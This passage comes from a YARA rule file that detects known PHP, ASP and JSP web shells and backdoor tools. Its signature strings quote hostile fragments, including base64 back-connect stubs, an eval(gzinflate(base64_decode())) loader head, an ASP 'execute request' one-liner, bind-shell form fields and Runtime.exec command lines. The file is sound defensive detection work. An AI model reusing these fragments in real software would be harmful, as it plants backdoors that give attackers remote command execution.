   		$s11 = "Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KIC"   
   	condition:   
   		all of them   
rule webshell_asp_shell : webshell {   
   	meta:   
   		description = "Web Shell - file shell.asp"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "e63f5a96570e1faf4c7b8ca6df750237"   
   	strings:   
   		$s7 = "<input type=\"submit\" name=\"Send\" value=\"GO!\">" fullword   
   		$s8 = "<TEXTAREA NAME=\"1988\" ROWS=\"18\" COLS=\"78\"></TEXTAREA>" fullword   
   	condition:   
   		all of them   
rule multiple_webshells_0018 {   
   	meta:   
   		description = "Semi-Auto-generated  - from files webadmin.php.php.txt, iMHaPFtp.php.php.txt, Private-i3lue.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		super_rule = 1   
   		was = "_webadmin_php_php_iMHaPFtp_php_php_Private_i3lue_php"   
   		hash0 = "b268e6fa3bf3fe496cffb4ea574ec4c7"   
   		hash1 = "12911b73bc6a5d313b494102abcf5c57"   
   		hash2 = "13f5c7a035ecce5f9f380967cf9d4e92"   
   	strings:   
   		$s0 = "return $type . $owner . $group . $other;" fullword   
   		$s1 = "$owner  = ($mode & 00400) ? 'r' : '-';" fullword   
   	condition:   
   		all of them   
rule shells_PHP_wso {   
   	meta:   
   		description = "Semi-Auto-generated  - file wso.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "33e2891c13b78328da9062fbfcf898b6"   
   	strings:   
   		$s0 = "$back_connect_p=\"IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbi"   
   		$s3 = "echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=pos"   
   	condition:   
   		1 of them   
rule multiple_webshells_0015 {   
   	meta:   
   		description = "Semi-Auto-generated  - from files wacking.php.php.txt, 1.txt, SpecialShell_99.php.php.txt, c100.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		super_rule = 1   
   		was = "_wacking_php_php_1_SpecialShell_99_php_php_c100_php"   
   		hash0 = "9c5bb5e3a46ec28039e8986324e42792"   
   		hash1 = "44542e5c3e9790815c49d5f9beffbbf2"   
   		hash2 = "09609851caa129e40b0d56e90dfc476c"   
   		hash3 = "38fd7e45f9c11a37463c3ded1c76af4c"   
   	strings:   
   		$s0 = "if(eregi(\"./shbd $por\",$scan))"   
   		$s1 = "$_POST['backconnectip']"   
   		$s2 = "$_POST['backcconnmsg']"   
   	condition:   
   		1 of them   
rule webshell_jsp_list1 {   
   	meta:   
   		description = "Web Shell - file list1.jsp"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "8d9e5afa77303c9c01ff34ea4e7f6ca6"   
   	strings:   
   		$s1 = "case 's':ConnectionDBM(out,encodeChange(request.getParameter(\"drive"   
   		$s9 = "return \"<a href=\\\"javascript:delFile('\"+folderReplace(file)+\"')\\\""   
   	condition:   
   		all of them   
rule byshell063_ntboot_2 {   
   	meta:   
   		description = "Webshells Auto-generated - file ntboot.dll"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "cb9eb5a6ff327f4d6c46aacbbe9dda9d"   
   	strings:   
   		$s6 = "OK,job was done,cuz we have localsystem & SE_DEBUG_NAME:)"   
   	condition:   
   		all of them   
rule phpshell_3 {   
   	meta:   
   		description = "Webshells Auto-generated - file phpshell.php"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "e8693a2d4a2ffea4df03bb678df3dc6d"   
   	strings:   
   		$s3 = "<input name=\"submit_btn\" type=\"submit\" value=\"Execute Command\"></p>"   
   		$s5 = "      echo \"<option value=\\\"$work_dir\\\" selected>Current Directory</option>\\n\";"   
   	condition:   
   		all of them   
rule php_in_image   
   {   
       meta:   
           author      = "Vlad https://github.com/vlad-s"   
           date        = "2016/07/18"   
           description = "Finds image files w/ PHP code in images"   
       strings:   
           $gif = /^GIF8[79]a/   
           $jfif = { ff d8 ff e? 00 10 4a 46 49 46 }   
           $png = { 89 50 4e 47 0d 0a 1a 0a }   
      
           $php_tag = "<?php"   
       condition:   
           (($gif at 0) or   
           ($jfif at 0) or   
           ($png at 0)) and   
      
           $php_tag   
rule webshell_itsec_itsecteam_shell_jHn {   
   	meta:   
   		description = "Web Shell - from files itsec.php, itsecteam_shell.php, jHn.php"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		super_rule = 1   
   		hash0 = "8ae9d2b50dc382f0571cd7492f079836"   
   		hash1 = "bd6d3b2763c705a01cc2b3f105a25fa4"   
   		hash2 = "40c6ecf77253e805ace85f119fe1cebb"   
   	strings:   
   		$s4 = "echo $head.\"<font face='Tahoma' size='2'>Operating System : \".php_uname().\"<b"   
   		$s5 = "echo \"<center><form name=client method='POST' action='$_SERVER[PHP_SELF]?do=db'"   
   	condition:   
   		all of them   
rule Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit_php {   
   	meta:   
   		description = "Semi-Auto-generated  - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "c6eeacbe779518ea78b8f7ed5f63fc11"   
   	strings:   
   		$s0 = "<option value=\"cat /var/cpanel/accounting.log\">/var/cpanel/accounting.log</opt"   
   		$s1 = "Liz0ziM Private Safe Mode Command Execuriton Bypass"   
   		$s2 = "echo \"<b><font color=red>Kimim Ben :=)</font></b>:$uid<br>\";" fullword   
   	condition:   
   		1 of them   
rule WebShell_php_webshells_NGH {   
   	meta:   
   		description = "PHP Webshells Github Archive - file NGH.php"   
   		author = "Florian Roth"   
   		hash = "c05b5deecfc6de972aa4652cb66da89cfb3e1645"   
   	strings:   
   		$s0 = "<title>Webcommander at <?=$_SERVER[\"HTTP_HOST\"]?></title>" fullword   
   		$s2 = "/* Webcommander by Cr4sh_aka_RKL v0.3.9 NGH edition :p */" fullword   
   		$s5 = "<form action=<?=$script?>?act=bindshell method=POST>" fullword   
   		$s9 = "<form action=<?=$script?>?act=backconnect method=POST>" fullword   
   		$s11 = "<form action=<?=$script?>?act=mkdir method=POST>" fullword   
   		$s16 = "die(\"<font color=#DF0000>Login error</font>\");" fullword   
   		$s20 = "<b>Bind /bin/bash at port: </b><input type=text name=port size=8>" fullword   
   	condition:   
   		2 of them   
rule Asmodeus_v0_1_pl {   
   	meta:   
   		description = "Semi-Auto-generated  - file Asmodeus v0.1.pl.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "0978b672db0657103c79505df69cb4bb"   
   	strings:   
   		$s0 = "[url=http://www.governmentsecurity.org"   
   		$s1 = "perl asmodeus.pl client 6666 127.0.0.1"   
   		$s2 = "print \"Asmodeus Perl Remote Shell"   
   		$s4 = "$internet_addr = inet_aton(\"$host\") or die \"ALOA:$!\\n\";" fullword   
   	condition:   
   		2 of them   
rule WebShell_Generic_PHP_5 {   
   	meta:   
   		description = "PHP Webshells Github Archive - from files ex0shell.php, megabor.php, GRP WebShell 2.0 release build 2018 (C)2006,Great.php"   
   		author = "Florian Roth"   
   		super_rule = 1   
   		hash0 = "64461ad8d8f23ea078201a31d747157f701a4e00"   
   		hash1 = "3df1afbcfa718da6fc8af27554834ff6d1a86562"   
   		hash2 = "ad86ef7f24f75081318146edc788e5466722a629"   
   	strings:   
   		$s0 = "(($perms & 0x0400) ? 'S' : '-'));" fullword   
   		$s10 = "} elseif (($perms & 0x8000) == 0x8000) {" fullword   
   		$s11 = "if (($perms & 0xC000) == 0xC000) {" fullword   
   		$s12 = "$info .= (($perms & 0x0008) ?" fullword   
   		$s16 = "// Block special" fullword   
   		$s18 = "$info = 's';" fullword   
   	condition:   
   		all of them   
rule Pack_InjectT {   
   	meta:   
   		description = "Webshells Auto-generated - file InjectT.exe"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "983b74ccd57f6195a0584cdfb27d55e8"   
   	strings:   
   		$s3 = "ail To Open Registry"   
   		$s4 = "32fDssignim"   
   		$s5 = "vide Internet S"   
   		$s6 = "d]Software\\M"   
   		$s7 = "TInject.Dll"   
   	condition:   
   		all of them   
rule webshell_PHP_a : webshell {   
   	meta:   
   		description = "Web Shell - file a.php"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "e3b461f7464d81f5022419d87315a90d"   
   	strings:   
   		$s1 = "echo \"<option value=\\\"\". strrev(substr(strstr(strrev($work_dir), \"/\""   
   		$s2 = "echo \"<option value=\\\"$work_dir\\\" selected>Current Directory</option>"   
   		$s4 = "<input name=\"submit_btn\" type=\"submit\" value=\"Execute Command\"></p> " fullword   
   	condition:   
   		2 of them   
rule HYTop_DevPack_config {   
   	meta:   
   		description = "Webshells Auto-generated - file config.asp"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "b41d0e64e64a685178a3155195921d61"   
   	strings:   
   		$s0 = "const adminPassword=\""   
   		$s2 = "const userPassword=\""   
   		$s3 = "const mVersion="   
   	condition:   
   		all of them   
rule Rem_View_php_php {   
   	meta:   
   		description = "Semi-Auto-generated  - file Rem View.php.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "29420106d9a81553ef0d1ca72b9934d9"   
   	strings:   
   		$s0 = "$php=\"/* line 1 */\\n\\n// \".mm(\"for example, uncomment next line\").\""   
   		$s2 = "<input type=submit value='\".mm(\"Delete all dir/files recursive\").\" (rm -fr)'"   
   		$s4 ="Welcome to phpRemoteView (RemView)"   
   	condition:   
   		1 of them   
rule webshell_shell_phpspy_2006_arabicspy_hkrkoz {   
   	meta:   
   		description = "Web Shell - from files shell.php, phpspy_2006.php, arabicspy.php, hkrkoz.php"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		super_rule = 1   
   		hash0 = "791708057d8b429d91357d38edf43cc0"   
   		hash1 = "40a1f840111996ff7200d18968e42cfe"   
   		hash2 = "e0202adff532b28ef1ba206cf95962f2"   
   		hash3 = "802f5cae46d394b297482fd0c27cb2fc"   
   	strings:   
   		$s5 = "$prog = isset($_POST['prog']) ? $_POST['prog'] : \"/c net start > \".$pathname."   
   	condition:   
   		all of them   
rule Unpack_Injectt {   
   	meta:   
   		description = "Webshells Auto-generated - file Injectt.exe"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "8a5d2158a566c87edc999771e12d42c5"   
   	strings:   
   		$s2 = "%s -Run                              -->To Install And Run The Service"   
   		$s3 = "%s -Uninstall                        -->To Uninstall The Service"   
   		$s4 = "(STANDARD_RIGHTS_REQUIRED |SC_MANAGER_CONNECT |SC_MANAGER_CREATE_SERVICE |SC_MAN"   
   	condition:   
   		all of them   
rule DxShell_php_php {   
   	meta:   
   		description = "Semi-Auto-generated  - file DxShell.php.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "33a2b31810178f4c2e71fbdeb4899244"   
   	strings:   
   		$s0 = "print \"\\n\".'Tip: to view the file \"as is\" - open the page in <a href=\"'.Dx"   
   		$s2 = "print \"\\n\".'<tr><td width=100pt class=linelisting><nobr>POST (php eval)</td><"   
   	condition:   
   		1 of them   
rule FSO_s_zehir4 {   
   	meta:   
   		description = "Webshells Auto-generated - file zehir4.asp"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "5b496a61363d304532bcf52ee21f5d55"   
   	strings:   
   		$s5 = " byMesaj "   
   	condition:   
   		all of them   
rule shelltools_g0t_root_HideRun {   
   	meta:   
   		description = "Webshells Auto-generated - file HideRun.exe"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "45436d9bfd8ff94b71eeaeb280025afe"   
   	strings:   
   		$s0 = "Usage -- hiderun [AppName]"   
   		$s7 = "PVAX SW, Alexey A. Popoff, Moscow, 1997."   
   	condition:   
   		all of them   
rule telnetd_pl {   
   	meta:   
   		description = "Semi-Auto-generated  - file telnetd.pl.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "5f61136afd17eb025109304bd8d6d414"   
   	strings:   
   		$s0 = "0ldW0lf" fullword   
   		$s1 = "However you are lucky :P"   
   		$s2 = "I'm FuCKeD"   
   		$s3 = "ioctl($CLIENT{$client}->{shell}, &TIOCSWINSZ, $winsize);#"   
   		$s4 = "atrix@irc.brasnet.org"   
   	condition:   
   		1 of them   
rule webshell_webshells_new_jspyyy {   
   	meta:   
   		description = "Web shells - generated from file jspyyy.jsp"   
   		author = "Florian Roth"   
   		date = "2014/03/28"   
   		score = 70   
   		hash = "b291bf3ccc9dac8b5c7e1739b8fa742e"   
   	strings:   
   		$s0 = "<%@page import=\"java.io.*\"%><%if(request.getParameter(\"f\")"   
   	condition:   
   		all of them   
rule FSO_s_indexer {   
   	meta:   
   		description = "Webshells Auto-generated - file indexer.asp"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "135fc50f85228691b401848caef3be9e"   
   	strings:   
   		$s3 = "<td>Nereye :<td><input type=\"text\" name=\"nereye\" size=25></td><td><input type=\"r"   
   	condition:   
   		all of them   
rule rdrbs084 {   
   	meta:   
   		description = "Webshells Auto-generated - file rdrbs084.exe"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "ed30327b255816bdd7590bf891aa0020"   
   	strings:   
   		$s0 = "Create mapped port. You have to specify domain when using HTTP type."   
   		$s8 = "<LOCAL PORT> <MAPPING SERVER> <MAPPING SERVER PORT> <TARGET SERVER> <TARGET"   
   	condition:   
   		all of them   
rule webshell_h4ntu_shell_powered_by_tsoi_  : webshell {   
   	meta:   
   		description = "Web Shell - file h4ntu shell [powered by tsoi].php"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "06ed0b2398f8096f1bebf092d0526137"   
   	strings:   
   		$s0 = "  <TD><DIV STYLE=\"font-family: verdana; font-size: 10px;\"><b>Server Adress:</b"   
   		$s3 = "  <TD><DIV STYLE=\"font-family: verdana; font-size: 10px;\"><b>User Info:</b> ui"   
   		$s4 = "    <TD><DIV STYLE=\"font-family: verdana; font-size: 10px;\"><?= $info ?>: <?= "   
   		$s5 = "<INPUT TYPE=\"text\" NAME=\"cmd\" value=\"<?php echo stripslashes(htmlentities($"   
   	condition:   
   		all of them   
rule httpdoor {   
   	meta:   
   		description = "Webshells Auto-generated - file httpdoor.exe"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "6097ea963455a09474471a9864593dc3"   
   	strings:   
   		$s4 = "''''''''''''''''''DaJKHPam"   
   		$s5 = "o,WideCharR]!n]"   
   		$s6 = "HAutoComplete"   
   		$s7 = "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?> <assembly xmlns=\"urn:sch"   
   	condition:   
   		all of them   
rule webshell_webshells_new_pHp {   
   	meta:   
   		description = "Web shells - generated from file pHp.php"   
   		author = "Florian Roth"   
   		date = "2014/03/28"   
   		score = 70   
   		hash = "b0e842bdf83396c3ef8c71ff94e64167"   
   	strings:   
   		$s0 = "if(is_readable($path)) antivirus($path.'/',$exs,$matches);" fullword   
   		$s1 = "'/(eval|assert|include|require|include\\_once|require\\_once|array\\_map|arr"   
   		$s13 = "'/(exec|shell\\_exec|system|passthru)+\\s*\\(\\s*\\$\\_(\\w+)\\[(.*)\\]\\s*"   
   		$s14 = "'/(include|require|include\\_once|require\\_once)+\\s*\\(\\s*[\\'|\\\"](\\w+"   
   		$s19 = "'/\\$\\_(\\w+)(.*)(eval|assert|include|require|include\\_once|require\\_once"   
   	condition:   
   		1 of them   
rule webshell_ASP_aspydrv {   
   	meta:   
   		description = "Web Shell - file aspydrv.asp"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "de0a58f7d1e200d0b2c801a94ebce330"   
   	strings:   
   		$s3 = "<%=thingy.DriveLetter%> </td><td><tt> <%=thingy.DriveType%> </td><td><tt> <%=thi"   
   	condition:   
   		all of them   
rule thelast_index3 {   
   	meta:   
   		description = "Webshells Auto-generated - file index3.php"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "cceff6dc247aaa25512bad22120a14b4"   
   	strings:   
   		$s5 = "$err = \"<i>Your Name</i> Not Entered!</font></h2>Sorry, \\\"Your Name\\\" field is r"   
   	condition:   
   		all of them   
rule multiple_webshells_0029 {   
   	meta:   
   		description = "Semi-Auto-generated  - from files c99shell_v1.0.php.php.txt, c99php.txt, 1.txt, c2007.php.php.txt, c100.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		super_rule = 1   
   		was = "_c99shell_v1_0_php_php_c99php_1_c2007_php_php_c100_php"   
   		hash0 = "d8ae5819a0a2349ec552cbcf3a62c975"   
   		hash1 = "9e9ae0332ada9c3797d6cee92c2ede62"   
   		hash2 = "44542e5c3e9790815c49d5f9beffbbf2"   
   		hash3 = "d089e7168373a0634e1ac18c0ee00085"   
   		hash4 = "38fd7e45f9c11a37463c3ded1c76af4c"   
   	strings:   
   		$s0 = "$result = mysql_query(\"SHOW PROCESSLIST\", $sql_sock); " fullword   
   	condition:   
   		all of them   
rule Moroccan_Spamers_Ma_EditioN_By_GhOsT_php {   
   	meta:   
   		description = "Semi-Auto-generated  - file Moroccan Spamers Ma-EditioN By GhOsT.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "d1b7b311a7ffffebf51437d7cd97dc65"   
   	strings:   
   		$s0 = ";$sd98=\"john.barker446@gmail.com\""   
   		$s1 = "print \"Sending mail to $to....... \";"   
   		$s2 = "<td colspan=\"2\" width=\"715\" background=\"/simparts/images/cellpic1.gif\" hei"   
   	condition:   
   		1 of them   
rule jsp_cmd : webshell {   
   	meta:   
   		description = "Laudanum Injector Tools - file cmd.war"   
   		author = "Florian Roth"   
   		reference = "http://laudanum.inguardians.com/"   
   		date = "2015-06-22"   
   		hash = "55e4c3dc00cfab7ac16e7cfb53c11b0c01c16d3d"   
   	strings:   
   		$s0 = "cmd.jsp}" fullword ascii   
   		$s1 = "cmd.jspPK" fullword ascii   
   		$s2 = "WEB-INF/web.xml" fullword ascii /* Goodware String - occured 1 times */   
   		$s3 = "WEB-INF/web.xmlPK" fullword ascii /* Goodware String - occured 1 times */   
   		$s4 = "META-INF/MANIFEST.MF" fullword ascii /* Goodware String - occured 12 times */   
   	condition:   
   		uint16(0) == 0x4b50 and filesize < 2KB and all of them   
rule c99madshell_v2_0_php_php {   
   	meta:   
   		description = "Semi-Auto-generated  - file c99madshell_v2.0.php.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "d27292895da9afa5b60b9d3014f39294"   
   	strings:   
   		$s2 = "eval(gzinflate(base64_decode('HJ3HkqNQEkU/ZzqCBd4t8V4YAQI2E3jvPV8/1Gw6orsVFLyXef"   
   	condition:   
   		all of them   
rule webshell_jsp_asd {   
   	meta:   
   		description = "Web Shell - file asd.jsp"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "a042c2ca64176410236fcc97484ec599"   
   	strings:   
   		$s3 = "<%@ page language=\"java\" pageEncoding=\"gbk\"%>" fullword   
   		$s6 = "<input size=\"100\" value=\"<%=application.getRealPath(\"/\") %>\" name=\"url"   
   	condition:   
   		all of them   
rule webshell_PHP_sql  : webshell {   
   	meta:   
   		description = "Web Shell - file sql.php"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "2cf20a207695bbc2311a998d1d795c35"   
   	strings:   
   		$s0 = "$result=mysql_list_tables($db) or die (\"$h_error<b>\".mysql_error().\"</b>$f_"   
   		$s4 = "print \"<a href=\\\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&"   
   	condition:   
   		all of them   
rule saphpshell {   
   	meta:   
   		description = "Webshells Auto-generated - file saphpshell.php"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "d7bba8def713512ddda14baf9cd6889a"   
   	strings:   
   		$s0 = "<td><input type=\"text\" name=\"command\" size=\"60\" value=\"<?=$_POST['command']?>"   
   	condition:   
   		all of them   
rule multiple_webshells_0007 {   
   	meta:   
   		description = "Semi-Auto-generated  - from files r577.php.php.txt, spy.php.php.txt, s.php.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		super_rule = 1   
   		was = "_r577_php_php_spy_php_php_s_php_php"   
   		hash0 = "0714f80f35c1fddef1f8938b8d42a4c8"   
   		hash1 = "eed14de3907c9aa2550d95550d1a2d5f"   
   		hash2 = "817671e1bdc85e04cc3440bbd9288800"   
   	strings:   
   		$s2 = "echo $te.\"<div align=center><textarea cols=35 name=db_query>\".(!empty($_POST['"   
   		$s3 = "echo sr(45,\"<b>\".$lang[$language.'_text80'].$arrow.\"</b>\",\"<select name=db>"   
   	condition:   
   		1 of them   
rule webshell_cihshell_fix : webshell {   
   	meta:   
   		description = "Web Shell - file cihshell_fix.php"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "3823ac218032549b86ee7c26f10c4cb5"   
   	strings:   
   		$s7 = "<tr style='background:#242424;' ><td style='padding:10px;'><form action='' encty"   
   		$s8 = "if (isset($_POST['mysqlw_host'])){$dbhost = $_POST['mysqlw_host'];} else {$dbhos"   
   	condition:   
   		1 of them   
rule webshell_s72_Shell_v1_1_Coding {   
   	meta:   
   		description = "Web Shell - file s72 Shell v1.1 Coding.php"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "c2e8346a5515c81797af36e7e4a3828e"   
   	strings:   
   		$s5 = "<font face=\"Verdana\" style=\"font-size: 8pt\" color=\"#800080\">Buradan Dosya "   
   	condition:   
   		all of them   
rule webshell_jsp_action {   
   	meta:   
   		description = "Web Shell - file action.jsp"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "5a7d931094f5570aaf5b7b3b06c3d8c0"   
   	strings:   
   		$s1 = "String url=\"jdbc:oracle:thin:@localhost:1521:orcl\";" fullword   
   		$s6 = "<%@ page contentType=\"text/html;charset=gb2312\"%>" fullword   
   	condition:   
   		all of them   
rule webshell_webshells_new_JJjsp3 {   
   	meta:   
   		description = "Web shells - generated from file JJjsp3.jsp"   
   		author = "Florian Roth"   
   		date = "2014/03/28"   
   		score = 70   
   		hash = "949ffee1e07a1269df7c69b9722d293e"   
   	strings:   
   		$s0 = "<%@page import=\"java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*\"%><%!S"   
   	condition:   
   		all of them   
rule sig_2008_php_php {   
   	meta:   
   		description = "Semi-Auto-generated  - file 2008.php.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "3e4ba470d4c38765e4b16ed930facf2c"   
   	strings:   
   		$s0 = "Codz by angel(4ngel)"   
   		$s1 = "Web: http://www.4ngel.net"   
   		$s2 = "$admin['cookielife'] = 86400;"   
   		$s3 = "$errmsg = 'The file you want Downloadable was nonexistent';"   
   	condition:   
   		1 of them   
rule webshell_phpspy_2005_full_phpspy_2005_lite_phpspy_2006_PHPSPY {   
   	meta:   
   		description = "Web Shell - from files phpspy_2005_full.php, phpspy_2005_lite.php, phpspy_2006.php, PHPSPY.php"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		super_rule = 1   
   		hash0 = "b68bfafc6059fd26732fa07fb6f7f640"   
   		hash1 = "42f211cec8032eb0881e87ebdb3d7224"   
   		hash2 = "40a1f840111996ff7200d18968e42cfe"   
   		hash3 = "0712e3dc262b4e1f98ed25760b206836"   
   	strings:   
   		$s4 = "http://www.4ngel.net" fullword   
   		$s5 = "</a> | <a href=\"?action=phpenv\">PHP" fullword   
   		$s8 = "echo $msg=@fwrite($fp,$_POST['filecontent']) ? \"" fullword   
   		$s9 = "Codz by Angel" fullword   
   	condition:   
   		2 of them   
rule BIN_Client {   
   	meta:   
   		description = "Webshells Auto-generated - file Client.exe"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "9f0a74ec81bc2f26f16c5c172b80eca7"   
   	strings:   
   		$s0 = "=====Remote Shell Closed====="   
   		$s2 = "All Files(*.*)|*.*||"   
   		$s6 = "WSAStartup Error!"   
   		$s7 = "SHGetFileInfoA"   
   		$s8 = "CreateThread False!"   
   		$s9 = "Port Number Error"   
   	condition:   
   		4 of them   
rule webshell_elmaliseker_2 {   
   	meta:   
   		description = "Web Shell - file elmaliseker.asp"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "b32d1730d23a660fd6aa8e60c3dc549f"   
   	strings:   
   		$s1 = "<td<%if (FSO.GetExtensionName(path & \"\\\" & oFile.Name)=\"lnk\") or (FSO.GetEx"   
   		$s6 = "<input type=button value=Save onclick=\"EditorCommand('Save')\"> <input type=but"   
   	condition:   
   		all of them   
rule cmdShell {   
   	meta:   
   		description = "Webshells Auto-generated - file cmdShell.asp"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "8a9fef43209b5d2d4b81dfbb45182036"   
   	strings:   
   		$s1 = "if cmdPath=\"wscriptShell\" then"   
   	condition:   
   		all of them   
rule dbgntboot {   
   	meta:   
   		description = "Webshells Auto-generated - file dbgntboot.dll"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "4d87543d4d7f73c1529c9f8066b475ab"   
   	strings:   
   		$s2 = "now DOS is working at mode %d,faketype %d,against %s,has worked %d minutes,by sp"   
   		$s3 = "sth junk the M$ Wind0wZ retur"   
   	condition:   
   		all of them   
rule multiple_webshells_0022 {   
   	meta:   
   		description = "Semi-Auto-generated  - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, c99shell_v1.0.php.php.txt, SpecialShell_99.php.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		super_rule = 1   
   		was = "_w_php_php_c99madshell_v2_1_php_php_wacking_php_php_c99shell_v1_0_php_php_SpecialShell_99_php_php"   
   		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"   
   		hash1 = "3ca5886cd54d495dc95793579611f59a"   
   		hash2 = "9c5bb5e3a46ec28039e8986324e42792"   
   		hash3 = "d8ae5819a0a2349ec552cbcf3a62c975"   
   		hash4 = "09609851caa129e40b0d56e90dfc476c"   
   	strings:   
   		$s0 = "c99ftpbrutecheck"   
   		$s1 = "$ftpquick_t = round(getmicrotime()-$ftpquick_st,4);" fullword   
   		$s2 = "$fqb_lenght = $nixpwdperpage;" fullword   
   		$s3 = "$sock = @ftp_connect($host,$port,$timeout);" fullword   
   	condition:   
   		2 of them   
rule PHP_Backdoor_Connect_pl_php {   
   	meta:   
   		description = "Semi-Auto-generated  - file PHP Backdoor Connect.pl.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "57fcd9560dac244aeaf95fd606621900"   
   	strings:   
   		$s0 = "LorD of IRAN HACKERS SABOTAGE"   
   		$s1 = "LorD-C0d3r-NT"   
   		$s2 = "echo --==Userinfo==-- ;"   
   	condition:   
   		1 of them   
rule webshell_caidao_shell_mdb {   
   	meta:   
   		description = "Web Shell - file mdb.asp"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "fbf3847acef4844f3a0d04230f6b9ff9"   
   	strings:   
   		$s1 = "<% execute request(\"ice\")%>a " fullword   
   	condition:   
   		all of them   
rule Tool_asp {   
   	meta:   
   		description = "Semi-Auto-generated  - file Tool.asp.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "8febea6ca6051ae5e2ad4c78f4b9c1f2"   
   	strings:   
   		$s0 = "mailto:rhfactor@antisocial.com"   
   		$s2 = "?raiz=root"   
   		$s3 = "DIGO CORROMPIDO<BR>CORRUPT CODE"   
   		$s4 = "key = \"5DCADAC1902E59F7273E1902E5AD8414B1902E5ABF3E661902E5B554FC41902E53205CA0"   
   	condition:   
   		2 of them   
rule webshell {   
   	meta:   
   		description = "Webshells Auto-generated - file webshell.php"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "f2f8c02921f29368234bfb4d4622ad19"   
   	strings:   
   		$s0 = "RhViRYOzz"   
   		$s1 = "d\\O!jWW"   
   		$s2 = "bc!jWW"   
   		$s3 = "0W[&{l"   
   		$s4 = "[INhQ@\\"   
   	condition:   
   		all of them   
rule FSO_s_ajan {   
   	meta:   
   		description = "Webshells Auto-generated - file ajan.asp"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "22194f8c44524f80254e1b5aec67b03e"   
   	strings:   
   		$s4 = "entrika.write \"BinaryStream.SaveToFile"   
   	condition:   
   		all of them   
rule JSP_Browser_APT_webshell {   
   	meta:   
   		description = "VonLoesch JSP Browser used as web shell by APT groups - jsp File browser 1.1a"   
   		author = "F.Roth"   
   		date = "10.10.2014"   
   		score = 60   
   	strings:   
   		$a1a = "private static final String[] COMMAND_INTERPRETER = {\"" ascii   
   		$a1b = "cmd\", \"/C\"}; // Dos,Windows" ascii   
   		$a2 = "Process ls_proc = Runtime.getRuntime().exec(comm, null, new File(dir));" ascii   
   		$a3 = "ret.append(\"!!!! Process has timed out, destroyed !!!!!\");" ascii   
   	condition:   
   		all of them   
rule WebShell_AK_74_Security_Team_Web_Shell_Beta_Version {   
   	meta:   
